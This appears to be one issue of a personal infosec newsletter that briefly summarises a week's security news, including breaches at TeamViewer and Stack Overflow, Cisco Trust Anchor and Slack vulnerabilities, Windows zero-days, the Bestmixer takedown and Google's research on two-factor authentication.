Personal note - regular issue \o/
There might be a few more minimal editions coming up in the next few weeks, please bear with me until I'm back in my regular routine. But I'm really happy that I got to publish a regular newsletter issue this week :-) Enjoy!
Breaches and leaks
- TeamViewer: hackers breached their systems back in 2016, but the company never disclosed it.
- Stack Overflow: an attacker got into their network on May 5th, and roamed around until detected on May 11th.
- Over 12.000 unsecured MongoDB databases have been dropped, leaving a note for ransom. I guess that's one way of getting rid of unsecured databases: link.
- OGUsers: An underground forum used to trade stolen accounts, was itself hacked. All data was put online on a rival's site. Ow, irony.
I somehow missed this last week. Maybe I'm getting numb to news articles starting with "security problem in Cisco product". Sarcasm aside, this seems serious.
<Takes deep breath>
There's a vulnerability that bypasses Cisco's Trust Anchor module, allowing an attacker to change anything they want without the security module detecting it. There's no patch yet, and once there is one you'll have to physically access the device to update, it can't be done remotely.
To exploit this vulnerability, you need the second disclosed vulnerability to get remote admin access. There is a patch for that one though, which you'll want to get asap.
There's another summary here, and the page of the researchers themselves here.
The hacker known as SandBoxEscaper, who has previously released Windows zero-days, has been busy this week, releasing no less than four zero-days/proof-of-concept exploits. I'm a bit hazy on which are zero days and which are exploits for known vulnerabilities, but either way: if you manage Windows systems you'll want to take a closer look.
Salesforce had a big facepalm moment this week. A change that they made in their production environment gave all employees access to all company files.
Only users of Salesforce Pardot were directly affected, but the company did take down all Salesforce services for a while to be certain.
There'a slew of companies cutting various ties with Huawei after Trump's executive order. It makes sense, I suppose, to not put critical infrastructure in the hands of a foreign power. But, as this article points out, there's still no evidence of malicious acts, and it would be very risky for China to include backdoors at all.
It's not as horrible as the recent similar Facebook stories, but still not great of course. It relates to a feature of Gsuite Enterprise where an admin can manually set a password for a user. Those passwords were stored in plain text.
Often when someone connects to your HTTPS site, their browser will first go to the regular (unsecured) HTTP endpoint before being redirected. But if the site is on the HSTS pre-load list, their browser will know to go straight to HTTPS.
Microsoft shipped an update adding *.gov.uk to that pre-load list, but unfortunately not all .gov.uk sites support HTTPS yet, which made them unreachable to the people who got that update. Microsoft pushed another update to fix the issue.
Mixing services are used to launder cryptocurrency, converting and wiring between various currencies and accounts so that law enforcement can't trace the coins back to the attackers. One of the bigger ones, Bestmixer, has been taken down by Europol, in collaboration with Dutch and Luxembourg authorities and McAfee.
Google performed research to see just how effective their security measures are in practice. It turns out that just enabling phone verification stops 100% of automated bots, 96% of bulk phishing attacks and 76% of targeted attacks. As you'd expect, the numbers go up even further if you progress to non-SMS based 2fa like on-device prompts and security keys.
I recently shared an article on this topic, but I had no idea they were actually working on this already. If you're a US citizen with infosec skills, and if you can qualify for security clearance, you can sign up as a cybersecurity volunteer at the USMC.
The issue has been patched, but I did find it an interesting read. The vulnerability exists in the slack:// protocol handler, which can be tricked into downloading anything the user clicks to a remote SMB share. Victims will still open the attachment, which then streams from the attacker's SMB server.
A fun project to browse through, showing a catalogue of hardware that can be useful to Red Teamers and pentesters. The links don't seem to point to anywhere that I can see, you'll want to go straight to the pdf.